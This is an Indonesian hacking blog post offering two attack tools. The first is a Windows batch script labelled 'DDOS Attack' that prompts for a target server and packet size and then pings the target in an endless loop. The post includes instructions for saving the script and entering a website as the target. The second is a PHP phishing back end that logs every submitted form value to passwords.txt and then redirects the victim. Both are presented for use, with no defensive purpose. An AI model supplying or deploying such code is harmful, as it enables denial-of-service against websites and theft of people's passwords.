www.joshuajordy.blogsppot.com
| UNTUK MENGHARGAI POST INI SEHENDAKNYA KAMU MENEKAN TOMBOL 'SHARE' YANG ADA PADA ATAS POST BLOG . sumber : www.hendromardika.blogspot.com |
Blood of 4rt and Blood of Hacking
Code:
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
Quote: bisa disave dgn namafile bebas sesuka bro n sist..
tapi ingat , File Extensi harus berformat .Bat
Quote:Contoh :
Sebelum = http://www.google.com/
Tukarkan kepada = www[.]google[.]com
*hilangkan tanda '[]'.
Setelah memasukkan url itu, tekan enter.
Quote: cara sama kok untuk web yg lain
| UNTUK MENGHARGAI POST INI SEHENDAKNYA KAMU MENEKAN TOMBOL 'SHARE' YANG ADA PADA ATAS POST BLOG . sumber : www.hendromardika.blogspot.com |
<form action="RANDOM URL" method="post"><?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



Copyright © 2010 Brian Blood4rt
Template N2y Shadow By Nano Yulianto